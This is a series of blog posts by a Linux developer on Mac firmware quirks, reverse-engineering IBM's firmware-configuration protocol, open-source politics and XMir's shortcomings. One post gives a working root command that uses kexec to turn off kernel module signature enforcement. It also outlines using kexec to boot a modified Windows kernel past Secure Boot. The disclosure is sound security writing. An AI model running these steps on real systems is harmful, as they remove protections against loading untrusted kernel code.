The ACPI _OSI interface is a mechanism for the firmware to determine the OS that the system is running. It turns out that this works fine for operating systems that export fairly static interfaces (Windows, which adds a new _OSI per release) and poorly for operating systems that don't even guarantee any kind of interface stability in security releases (Linux, which claimed to be "Linux" regardless of version until we turned that off). OS X claims to be Darwin and nothing else. As I mentioned before, claiming to be Darwin in addition to Windows was enough to get the Thunderbolt hardware to stay alive after boot, but it wasn't enough to get it powered up again after suspend.

It turns out that there's two sections of ACPI code where this Mac checks _OSI. The first is something like:

if (_OSI("Darwin")) Store 0x2710 OSYS; else if(_OSI("Windows 2009") Store 0x7D9 OSYS; else…

ie, if the OS claims to be Darwin, all other strings are ignored. This is called from \_SB._INI(), which is the first ACPI method the kernel executes. The check for whether to power down the Thunderbolt controller occurs after this and then works correctly.

The second version is less helpful. It's more like:

if (_OSI("Darwin")) Store 0x2710 OSYS; if (_OSI("Windows 2009")) Store 0x7D9 OSYS; if…

ie, if the OS claims to be both Darwin and Windows 2009 (which Linux will if you pass acpi_osi="Darwin"), the OSYS variable gets set to the Windows 2009 value. This version gets called during PCI initialisation, and once it's run all the other Thunderbolt ACPI calls stop doing anything and the controller gets powered down after suspend/resume. That can be fixed easily enough by special casing Darwin. If the platform requests Darwin before anything else, we'll just stop claiming to be Windows.

Phew. Working Thunderbolt! (Well, almost - _OSC fails and so we disable PCIe hotplug, but that's easy to work around). But boo, no working battery. Apple do something very strange with their ACPI battery interface. If you're running anything that doesn't claim to be Darwin, Apple expose an ACPI Control Method battery. Control Method interfaces abstract the complexity away into either ACPI bytecode or system management traps - the OS simply calls an ACPI method, magic happens and it gets an answer back. If you claim to be Darwin, Apple remove that interface and instead expose the raw ACPI Smart Battery System interface. This provides an i2c bus over which the OS must then speak the Smart Battery System protocol, allowing it to directly communicate with the battery.

Linux has support for this, but it seems that this wasn't working so well and hadn't been for years. Loading the driver resulted in modprobe hanging until a timeout occurred, and most accesses to the battery would (a) take forever and (b) probably fail. It also had the nasty habit of breaking suspend and resume, which was unfortunate since getting Thunderbolt working over suspend and resume was the whole point of this exercise.

So. I modified the sbs driver to dump every command it sent over the i2c bus and every response it got. Pretty quickly I found that the failing operation was a write - specifically, a write used to select which battery should be connected to the bus. Interestingly, Apple implemented their Control Method interface by just using ACPI bytecode to speak the SBS protocol. Looking at the code in question showed that they never issued any writes, and the battery worked fine anyway. So why were we writing? SBS provides a command to tell you the current state of the battery subsystem, including which battery (out of a maximum of 4) is currently selected. Unsurprisingly, calling this showed that the battery we wanted to talk to was already selected. We then asked the SBS manager to select it anyway, and the manager promptly fell off the bus and stopped talking to us. In keeping with the maxim of "If hardware complains when we do something, and if we don't really need to do that, don't do that", this makes it work.

Working Thunderbolt and working battery. We're even getting close to getting switchable GPU support working reasonably, which is probably just going to involve rewriting the entirety of fbcon or something similarly amusing.
2014-03-09 11:48 pm

The simple things in life

I've spent a while trying to make GPU switching work more reliably on Apple hardware, and got to the point where my Retina MBP now comes up with X running on Intel regardless of what the firmware wanted to do (test patches here). But in the process I'd introduced an additional GPU switch which added another layer of flicker to the boot process. I spent some time staring at driver code and poking registers trying to figure out how I could let i915 probe EDID from the panel without switching the display over and made no progress at all.

And then I realised that nouveau already has all the information that i915 wants, and maybe we could just have the Switcheroo code hand that over instead of forcing i915 to probe again. Sigh.
2014-02-23 10:32 am

The importance of a community-focused mindset

Piston, an Openstack-in-a-box vendor[1], are a sponsor of the Red Hat[2] Summit this year. Last week they briefly ceased to be for no publicly stated reason, although it's been suggested that this was in response to Piston winning a contract that Red Hat was also bidding on. This situation didn't last for long - Red Hat's CTO tweeted that this was an error and that Red Hat would pay Piston's sponsorship fee for them.

To Red Hat's credit, having the CTO immediately and publicly accept responsibility and offer reparations seems like the best thing they could possibly do in the situation and demonstrates that there are members of senior management who clearly understand the importance of community collaboration to Red Hat's success. But that leaves open the question of how this happened in the first place.

Red Hat is big on collaboration. Workers get copies of the Red Hat Brand Book, an amazingly well-written description of how Red Hat depends on the wider community. New hire induction sessions stress the importance of open source and collaboration. Red Hat staff are at the heart of many vital free software projects. As far as fundamentally Getting It is concerned, Red Hat are a standard to aspire to.

Which is why something like this is somewhat unexpected. Someone in Red Hat made a deliberate choice to exclude Piston from the Summit. If the suggestion that this was because of commercial concerns is true, it's antithetical to the Red Hat Way. Piston are a contributor to upstream Openstack, just as Red Hat are. If Piston can do a better job of selling that code than Red Hat can, the lesson that Red Hat should take away is that they need to do a better job - not punish someone else for doing so.

However, it's not entirely without precedent. The most obvious example is the change to kernel packaging that happened during the RHEL 6 development cycle. Previous releases had included each individual modification that Red Hat made to the kernel as a separate patch. From RHEL 6 onward, all these patches are merged into one giant patch. This was intended to make it harder for vendors like Oracle to compete with RHEL by taking patches from upcoming RHEL point releases, backporting them to older ones and then selling that to Red Hat customers. It obviously also had the effect of hurting other distributions such as Debian who were shipping 2.6.32-based kernels - bugs that were fixed in RHEL had to be separately fixed in Debian, despite Red Hat continuing to benefit from the work Debian put into the stable 2.6.32 point releases.

It's almost three years since that argument erupted, and by and large the community seems to have accepted that the harm Oracle were doing to Red Hat (while giving almost nothing back in return) justified the change. The parallel argument in the Piston case might be that there's no reason for Red Hat to give advertising space to a company that's doing a better job of selling Red Hat's code than Red Hat are. But the two cases aren't really equal - Oracle are a massively larger vendor who take significantly more from the Linux community than they contribute back. Piston aren't.

Which brings us back to how this could have happened in the first place. The Red Hat company culture is supposed to prevent people from thinking that this kind of thing is acceptable, but in this case someone obviously did. Years of Red Hat already having strong standing in a range of open source communities may have engendered some degree of complacency and allowed some within the company to lose track of how important Red Hat's community interactions are in perpetuating that standing. This specific case may have been resolved without any further fallout, but it should really trigger an examination of whether the reality of the company culture still matches the theory. The alternative is that this kind of event becomes the norm rather than the exception, and it takes far less time to lose community goodwill than it takes to build it in the first place.

[1] And, in the spirit of full disclosure, a competitor to my current employer
[2] Furthering the spirit of full disclosure, a former employer
2014-02-10 11:14 am

IBM's remote firmware configuration protocol

I spent last week looking into the firmware configuration protocol used on current IBM system X servers. IBM provide a tool called ASU for configuring firmware settings, either in-band (ie, running on the machine you want to reconfigure) or out of band (ie, running on a remote computer and communicating with the baseboard management controller - IMM in IBM-speak). I'm not a fan of using vendor binaries for this kind of thing. They tend to be large (ASU is a 20MB executable) and difficult to script, so I'm gradually reimplementing them in Python. Doing that was fairly straightforward for Dell and Cisco, both of whom document their configuration protocol. IBM, on the other hand, don't. My first plan was to just look at the wire protocol, but it turns out that it's using IPMI 2.0 to communicate and that means that the traffic is encrypted. So, obviously, time to spend a while in gdb.

The most important lesson I learned last time I did this was "Check whether the vendor tool has a debug option". ASU didn't mention one in its help text and there was no sign of a getopt string, so this took a little longer - but nm helpfully showed a function called DebugLog and setting a breakpoint on that in gdb showed it being called a bunch of the time, so woo. Stepping through the function revealed that it was checking the value of a variable, and looking for other references to that variable in objdump revealed a -l argument. Setting that to 255 gave me rather a lot of output. Nearby was a reference to --showsptraffic, and passing that as well gave me output like:

BMC Sent: 2e 90 4d 4f 00 06 63 6f 6e 66 69 67 2e 65 66 69
BMC Recv: 00 4d 4f 00 21 9e 00 00

which was extremely promising. 2e is IPMI-speak for an OEM specific command, which seemed pretty plausible. 4d 4f 00 is 20301 in decimal, which is the IANA enterprise number for IBM's system X division (this is required by the IPMI spec, it wasn't an inspired piece of deduction on my behalf). 63 6f 6e 66 69 67 2e 65 66 69 is ASCII for config.efi. That left 90 and 06 to figure out. 90 appeared in all of the traces, so it appears to be the command to indicate that the remaining data is destined for the IMM. The prior debug output indicated that we were in the QuerySize function, so 06 presumably means… query the size. And this is supported by the response - 00 (a status code), 4d 4f 00 (the IANA enterprise number again, to indicate that the responding device is speaking the same protocol as you) and 21 9e 00 00 - or, in rational endianness, 40481, an entirely plausible size.
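
To make the layout concrete, here's a small sketch that rebuilds that query-size request from the deduced fields - the interpretation is mine, based purely on the traces above:

#include <stdint.h>
#include <stdio.h>
#include <string.h>

int main(void)
{
        /* Layout as deduced from the traces above - a best guess, not
         * anything IBM document */
        const char *filename = "config.efi";
        uint8_t req[32];
        size_t len = 0;

        req[len++] = 0x90;              /* command: file transfer to/from the IMM */
        req[len++] = 0x4d;              /* IANA enterprise number 20301 (IBM */
        req[len++] = 0x4f;              /* System x), little-endian */
        req[len++] = 0x00;
        req[len++] = 0x06;              /* subcommand: query file size */
        memcpy(req + len, filename, strlen(filename));
        len += strlen(filename);

        /* Send byte 0 as the command of an OEM (netfn 0x2e) IPMI request
         * and the rest as its data; the response is a status code, the
         * IANA number again and a little-endian size */
        for (size_t i = 0; i < len; i++)
                printf("%02x ", req[i]);
        printf("\n");
        return 0;
}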

Once I'd got that far the rest started falling into place fairly quickly. 01 rather than 06 indicated a file open request, returning a four byte file handle of some description. 02 was read, 03 was write and 05 was close. Hacking this together with pyghmi meant I could open a file and read it. Success!

Well, kind of. I was getting back a large blob of binary. The debug trace showed calls to an EfiDecompress function, so on a whim I tried just decompressing it using the standard UEFI compression format. Shockingly, it worked and now I had a 345K XML blob and presumably many more problems than I'd previously had. Parsing the XML was fairly straightforward, and now I could retrieve the full set of config options, along with the default, current and possible values for them.

Making changes was pretty much just the reverse of this. A small XML blob containing the new values is compressed and written to asu_update.efi. One of the elements is a random identifier, which will then appear in another file called config_log along with a status. Just keep re-reading this until the value changes to CM_DONE and we're good.

The in-band configuration appears to be identical, but rather than sending commands over the wire they're sent through the system's IPMI controller directly. Yes, this does mean that it's sending compressed XML through a single io port. Yes, I'd rather be drinking.

I've documented the protocol here and hope to be able to release this code before too long - right now I'm trying to nail down the interface a little, but it's broadly working.
2014-01-20 10:45 am

Not all CLAs are equal

Contributor License Agreements ("CLAs") are a mechanism for an upstream software developer to insist that contributors grant the upstream developer some additional set of rights. These range in extent - some CLAs require that the contributor reassign their copyright over the contribution to the upstream developer, some merely provide the upstream developer with a grant of rights that aren't explicit in the software license (such as an explicit patent grant for a contribution licensed under a BSD-style license).

CLAs aren't new. FSF-copyrighted projects have been using copyright assignment since at least 1985 - in return, the FSF promise that the software will always be distributed under a copyleft-style license. For over a decade, Apache Software Foundation projects have required that contributors sign a CLA that allows them to retain copyright, but grants the ASF the right to relicense the work as it wishes. For the most part, this hasn't been terribly controversial.

So why do people object so much when Canonical do it? I've written about this in the context of Mir before, but it's worth expanding on the general case. The FSF's copyright assignment ensures that contributions to GPLed software will only be distributed under GPL-style licenses. The Apache CLA permits the ASF to relicense a contribution under a proprietary license, but the Apache license allows anyone to do that anyway. Going through Wikipedia's list of CLA users, the majority cover projects that are under BSD- or Apache-style licenses, with a couple of cases covering GPLed projects with a promise that any contributions will only be distributed under GPL-like licenses[1]. Either everyone can produce proprietary derivative works, or nobody can.

In contrast, Canonical ship software under the GPLv3 family of licenses (GPL, AGPL and LGPL) but require that contributors sign an agreement that permits Canonical to relicense their contributions under a proprietary license. This is a fundamentally different situation to almost all widely accepted CLAs, and it's disingenuous for Canonical to defend their CLA by pointing out the broad community uptake of, for instance, the Apache CLA.

Canonical could easily replace their CLA with one that removed this asymmetry - Project Harmony, the basis of Canonical's CLA, permits you to specify an "inbound equals outbound" agreement that prevents upstream from relicensing under a proprietary license[2]. Canonical's deliberate choice not to do so just strengthens the argument that the CLA is primarily about wanting to produce proprietary versions of software rather than wanting to strengthen their case in any copyright or patent disputes. It's unsurprising that people feel disinclined to contribute to projects under those circumstances, and it's difficult to understand why Canonical simultaneously insist on this hostile behaviour and bemoan the lack of community contribution to Canonical projects.

[1] The one major exception is the Digia/Qt project CLA, which covers an LGPLed work but makes it entirely clear that Digia will ship your contributions under proprietary licenses as well. At least they're honest.

[2] See the various options in section 2.1(d) here. Canonical chose option five. If they'd chosen option one instead, this wouldn't be a problem.
2013-12-03 03:06 pm
Entry tags:

Subverting security with kexec

(Discussion of a presentation I gave at Kiwicon last month)

Kexec is a Linux kernel feature intended to allow the booting of a replacement kernel at runtime. There are a few reasons you might want to do that, such as using Linux as a bootloader[1], rebooting without having to wait for the firmware to reinitialise, or booting into a minimal kernel and userspace on crash in order to save system state for later analysis.

But kexec's significantly more flexible than this. The kexec system call interface takes a list of segments (ie, pointers to a userspace buffer and the desired target destination) and an entry point. The kernel relocates those segments and jumps to the entry point. That entry point is typically code referred to as purgatory, due to the fact that it lives between the world of the first kernel and the world of the second kernel. The purgatory code sets up the environment for the second kernel and then jumps to it. The first kernel doesn't need to know anything about what the second kernel is or does. While it's conventional to load Linux, you can load just about anything.
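
For illustration, this is roughly what that interface looks like from userspace - a minimal ctypes sketch of the kexec_load system call, assuming the x86-64 syscall number (246) and the struct kexec_segment layout from <linux/kexec.h>. In reality you'd let kexec-tools do all of this for you, since building valid segments and purgatory is the hard part.

import ctypes
import ctypes.util

SYS_kexec_load = 246        # x86-64 syscall number - architecture-specific
KEXEC_ARCH_DEFAULT = 0      # flags can also include e.g. KEXEC_PRESERVE_CONTEXT

class KexecSegment(ctypes.Structure):
    # Mirrors struct kexec_segment: a userspace buffer plus the physical
    # destination the kernel should relocate it to.
    _fields_ = [('buf', ctypes.c_void_p),
                ('bufsz', ctypes.c_size_t),
                ('mem', ctypes.c_void_p),
                ('memsz', ctypes.c_size_t)]

libc = ctypes.CDLL(ctypes.util.find_library('c'), use_errno=True)

def kexec_load(entry, segments, flags=KEXEC_ARCH_DEFAULT):
    # entry is the address jumped to after relocation - typically the purgatory
    seg_array = (KexecSegment * len(segments))(*segments)
    if libc.syscall(SYS_kexec_load, ctypes.c_ulong(entry),
                    ctypes.c_ulong(len(segments)), seg_array,
                    ctypes.c_ulong(flags)) != 0:
        raise OSError(ctypes.get_errno(), 'kexec_load failed')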

The most important thing to note here is that none of this is signed. In other words, despite us having a robust in-kernel mechanism for ensuring that only signed modules can be inserted into the kernel, root can still load arbitrary code via kexec and execute it. This seems like a somewhat irritating way to patch the running kernel, so thankfully there's a much more straightforward approach.

I modified kexec to add an additional loader and uploaded the code here. Build and install it. Make sure that /sys/module/module/parameters/sig_enforce on your system is "Y". Then, as root, do something like:
kexec --type="dummy" --address=`printf "0x%x" $(( $(grep "B sig_enforce" /proc/kallsyms | awk '{print "0x"$1}') & 0x7fffffff))` --value=0 --load-preserve-context --mem-max=0x10000 /bin/true
to load it[2]. Now do kexec -e and watch colours flash and check /sys/module/module/parameters/sig_enforce again.

The beauty of this approach is that it doesn't rely on any kernel bugs - it's using kernel functionality that was explicitly designed to let you do this kind of thing (ie, run arbitrary code in ring 0). There's not really any way to fix it beyond adding a new system call that has rather tighter restrictions on the binaries that can be loaded. If you're using signed modules but still permit kexec, you're not really adding any additional security.

But that's not the most interesting way to use kexec. If you can load arbitrary code into the kernel, you can load anything. Including, say, the Windows kernel. ReactOS provides a bootloader that's able to boot the Windows 2003 kernel, and it shouldn't be too difficult for a sufficiently enterprising individual to work out how to get Windows 8 booting. Things are a little trickier on UEFI - you need to tell the firmware which virtual→physical map to use, and you can only do it once. If Linux has already done that, it's going to be difficult to set up a different map for Windows. Thankfully, there's an easy workaround. Just boot with the "noefi" kernel argument and the kernel will skip UEFI setup, letting you set up your own map.

Why would you want to do this? The most obvious reason is avoiding Secure Boot restrictions. Secure Boot, if enabled, is explicitly designed to stop you booting modified kernels unless you've added your own keys. But if you boot a signed Linux distribution with kexec enabled (like, say, Ubuntu) then you're able to boot a modified Windows kernel that will still believe it was booted securely. That means you can disable stuff like the Early Launch Anti-Malware feature or driver signing, or just stick whatever code you want directly into the kernel. In most cases all you'd need for this would be a bootloader, kernel and an initrd containing support for the main storage, an ntfs driver and a copy of kexec-tools. That should be well under 10MB, so it'll easily fit on the EFI system partition. Copy it over the Windows bootloader and you should be able to boot a modified Windows kernel without any terribly obvious graphical glitches in the process.

And that's the story of why kexec is disabled on Fedora when Secure Boot is enabled.

[1] That way you only have to write most drivers once
[2] The address section finds the address of the sig_enforce symbol in the kernel, and the value argument tells the dummy code what value to set that address to. --load-preserve-context informs the kernel that it should save hardware state in order to permit returning to the original kernel. --mem-max indicates the highest address that the kernel needs to back up. /bin/true is just there to satisfy the argument parser.
2013-10-16 01:48 pm
Entry tags:

Standing for the Linux Foundation Technical Advisory Board

According to its charter, the Linux Foundation Technical Advisory Board exists "to advise The Linux Foundation Board of Directors (Board) and the management of The Linux Foundation (Management) on matters related to supporting the technical agenda of The Linux Foundation". It consists of 10 members, with 5 seats up for election each year. Elections take place at an event at Kernel Summit, but are also open to attendees of whichever conference is colocated with the Kernel Summit that year. The election announcement is emailed to the Linux kernel list and tech-board-discuss, a mostly moribund list that springs into life once a year for election announcements.

This arrangement seemed odd to me even back in 2007. Back then the Linux Foundation was already sponsoring development of certain non-kernel components, and now that list is even larger. While nominally open to all, nominations for the TAB tend to be people actively involved in the kernel community. That's probably better than limiting it to any other single technical community (kernel developers tend to end up dealing with bugs from a fairly wide range of projects, so they're not entirely unaware of what other people have to deal with), but it still seems suboptimal. The current membership is mostly limited to people who spend little to no time working with userspace developers, let alone anyone active in other Linux Foundation projects. I don't think this is a good thing.

So, after several years of considering it, I'm finally standing for the TAB. I've been an active developer at most levels of the Linux stack, from the kernel through to desktop environments. I've worked closely with distributions. I've even worked closely with firmware developers. I'm not intimately involved in any of the other Linux Foundation projects, but I have experience that allows me to better understand their needs and motivations than I'd have from having spent my entire life living in the kernel. Being on the TAB would make it easier to ensure that these projects are represented in a meaningful way.

Of the other people who I know are standing (and this list may well grow longer), I'm inclined to vote for:
  • Greg Kroah-Hartman - while we've disagreed on a range of points, Greg's worked closely with userspace developers and even represents the Linux Foundation on the UEFI Forum. He's able to provide a wide range of expertise to the TAB, and the TAB benefits from that.
  • Jon Corbet - Jon's work on LWN should need no introduction. He's done an amazing job of keeping track of a range of technical developments across the entire Linux community, so is uniquely well suited to making sure that a range of opinions is represented.
  • Sarah Sharp - Sarah's certainly primarily a kernel developer, but she's been the loudest voice calling for the kernel community to spend some time thinking about whether it's as welcoming as it could be. Increasing the diversity of the kernel community allows us to hear a wider range of technical viewpoints, which benefits both the kernel and everything that depends on it.

The election is currently scheduled to take place at the National Museum in Edinburgh on the evening of the 23rd of October. If you're attending Linuxcon or one of the colocated events, please do come along and vote.

(Updated to correct a typo)
2013-10-15 10:10 am
Entry tags:

Hacker News is a social echo chamber

Hacker News is a fairly influential link aggregation site, with stories submitted and voted on by users. As explained in the FAQ, the ranking of stories is roughly determined by the number of votes divided by a function of the time since submission. It's not a huge traffic driver (my personal experience of stories on the front page is on the order of 30,000 hits), but it's notable because the demographic tends to include a more technically literate and influential set of readers than most other sites. The discussion that ensues from technical posts often includes meaningful feedback from domain experts. Stories that appear there are likely to be noted by technology workers, especially in the Silicon Valley startup field[1].
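
As a rough illustration, the base formula is commonly approximated as points decayed by a power of age - the figures below come from the Arc snippets that have circulated publicly rather than anything formally confirmed, and the penalties discussed later are applied on top of this.

def hn_score(votes, age_hours, gravity=1.8):
    # Widely quoted approximation: points (minus the submitter's own vote)
    # divided by a power of the story's age. Flag/flamewar penalties not modelled.
    return (votes - 1) / (age_hours + 2) ** gravity

# An older story needs far more votes than a fresh one to hold its rank:
print(hn_score(100, 24))    # ~0.28
print(hn_score(10, 1))      # ~1.25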

That rather specific demographic appears to correlate with other traits. There's a rather more techno-libertarian bias on Hacker News than on most general discussion forums, which is consistent with the startup-oriented culture that it springs from - the desire to provide disruptive solutions to real world problems tends to collide with existing regulatory frameworks, so it's unsurprising that a belief in individual rights and small government would overlap with US startup culture. There's a leaning towards the use of web technologies rather than traditional client applications, which matches what people are doing in the rest of the world. And there's more enthusiasm for liberal open-source licenses over Copyleft licenses, which makes sense in a web-focused environment (as I wrote about here).

Now, personally I'm a big-government, client-app, Copyleft kind of person, but for the most part I don't think the above is actively dangerous. It's inevitable that political views will vary, we'll probably continue to cycle between thick and thin clients for generations and nobody's ever going to demonstrably prove that one licensing model deserves to win over another. But what is important is that the ongoing debates between these opinions be driven by facts, and that it remain obvious that these disagreements exist. As far as technical (and even political) discussion goes, Hacker News doesn't seem to have a problem with that. Disagreeing with the orthodoxy is tolerated.

This seems less true when it comes to social issues. When a posting discussing the myth of the natural-born programmer[2] hit the front page, the top-rated comment was from Paul Graham[3], off-handedly discounting the conclusions drawn. The original story linked to a review of peer-reviewed scientific research; Graham simply dismissed it on the basis of his preconceptions. Shortly afterwards, the story plummeted off the front page, now surrounded by stories posted around the same time but with much lower scores.

How does this happen? There are two publicised mechanisms that can result in stories dropping down the order. Users with high karma scores (earned either by submitting popular stories or by writing popular comments) are able to flag submissions, and if enough do so then a negative weighting is applied to the story. There's also a flamewar detector, a heuristic that attempts to detect contentious subjects and pushes them off the front page.

The effect of both is to enforce the status quo of social beliefs. Stories that appear to challenge the narrative that good programmers are just naturally talented tend to vanish. Stories that discuss the difficulties faced by minorities in our field are summarily disappeared. There are no social problems in the technology industry. We have always been at war with Eastasia.

This isn't healthy. We don't improve the state of the software industry by hiding stories that expose conflicts. Flamewars don't solve problems, but without them we'd be entirely unaware of how much of a victim blaming mentality exists amongst our peers. It's true that conflict may reinforce preconceptions, causing people to dig in as they defend their beliefs. However, the absence of conflict does nothing to counteract that. If you're never exposed to opinions you disagree with, you'll never question your existing beliefs.

Hacker News is a privately run site and nobody's under any obligation to change how they choose to run it. But the focus on avoiding conflict to such an extent that controversial stories receive less exposure than ones that fit people's existing beliefs doesn't enhance our community. If we want to be able to use technology as an instrument of beneficial change to society as a whole, we benefit from building a diverse and welcoming community and questioning our preconceptions. Building a social echo chamber risks marginalising us from the rest of society, gradually becoming ignored and irrelevant as our self-reinforcing opinions drift ever further away from the mainstream. It doesn't help anybody.

[1] During the batch of interviews I did last year, two separate interviewers both mentioned a story they'd read on Hacker News that turned out to have been written by me. I'm not saying that that's what determined a hire/don't hire decision, but it seems likely that it helped.
[2] The article in question discusses the pervasive idea that some people are inherently good programmers. It turns out that perpetuating the idea that some people are just born good at a particular skill actually discourages others from even trying to learn it, even those who are just as capable.
[3] One of the co-founders of Y Combinator and the creator of Hacker News.

(Edited to fix a footnote reference)
2013-10-02 11:42 am
Entry tags:

The state of XMir

XMir's been delayed from Ubuntu 13.10. The stated reason is that multi-monitor support isn't sufficiently reliable. That's true, but it's far from the only problem that XMir still has:

  • It's still broken on some single-monitor systems

  • Some machines have display corruption. There are writes to freed memory. To be fair, some of the behaviour that's been seen has been down to underlying bugs in the Xorg drivers that were never triggered under normal use but are hit by XMir. Others are down to implicit assumptions made in the drivers that XMir happens to violate. The problem is that there doesn't appear to have been enough room in the schedule to deal with these interactions, presumably because nobody accounted for the inevitable "This thing we thought would be easy turns out to be difficult" part of the project.

  • The input driver bug still isn't really fixed

  • I've mentioned this bug before. It's now marked "Fix released", which is kind of true but not really. Mir now tells XMir that the VT is changing before the VT is changed, but it doesn't wait for XMir to finish handling that notification before actually switching. Until XMir is scheduled and runs, it's still receiving input events. In most circumstances that window is small, so there's no real risk of triggering it accidentally.

    There's one corner case where it might still cause problems. Simply running isn't enough - XMir has to make progress through its event loop. That'll only happen if the X server is processing its wakeup events, and it's possible to effectively stall that by submitting a sufficiently awkward drawing request to the server. The X server will appear to freeze, and if the user then attempts to work out what's going on by switching to a VT and logging in, those input events will still be going to XMir. It's left as an exercise to the reader to construct ways to take advantage of this.

    This can't happen in Xorg because the VT switch is blocked until the input devices have been released. Mir could have done the same, but doesn't because of a conscious design decision - in the Ubuntu Phone world, clients stop doing things when they're told to. Ubuntu Desktop is expected to behave the same way.

    This is an unfortunate situation to be in. Ubuntu Desktop was told that they were switching to XMir, but Mir development seems to be driven primarily by the needs of Ubuntu Phone. XMir has to cope with things that no other Mir client ever will, and unless Mir development takes that into account it's inevitably going to suffer breakage like this. Canonical management needs to resolve this if there's any hope of ever shipping XMir by default.

  • It's still missing features

  • XMir doesn't support colour profiles. XRandR properties aren't exposed, so there's no way to control TV output encoding or overscan. There's still no hardware cursor support. Switching to XMir now would reduce functionality without providing any user-visible gain.


It's clear that XMir has turned into a larger project than Canonical had originally anticipated, but that's hardly surprising. There's only one developer with previous X experience working on it full-time, and the announced schedule provided no opportunity to deal with unexpected problems. As if that weren't enough, there's obvious conflict between Ubuntu Desktop and Ubuntu Phone when it comes to developer time and required functionality. The one hardware vendor who's willing to take a public stand has demonstrated that they have no interest in supporting XMir, despite Canonical assuring people that they were already engaging in productive negotiations with GPU manufacturers.

Multiple monitor support may be the single most obvious feature where XMir is lacking, but it's not the only one. Technically and politically, this code is a long way from being ready for prime time. Without significant community contribution, Canonical need to focus on prioritising it appropriately rather than expecting a tiny number of developers to perform miracles. Or, alternatively, they could just drop XMir entirely and focus on Unity 8.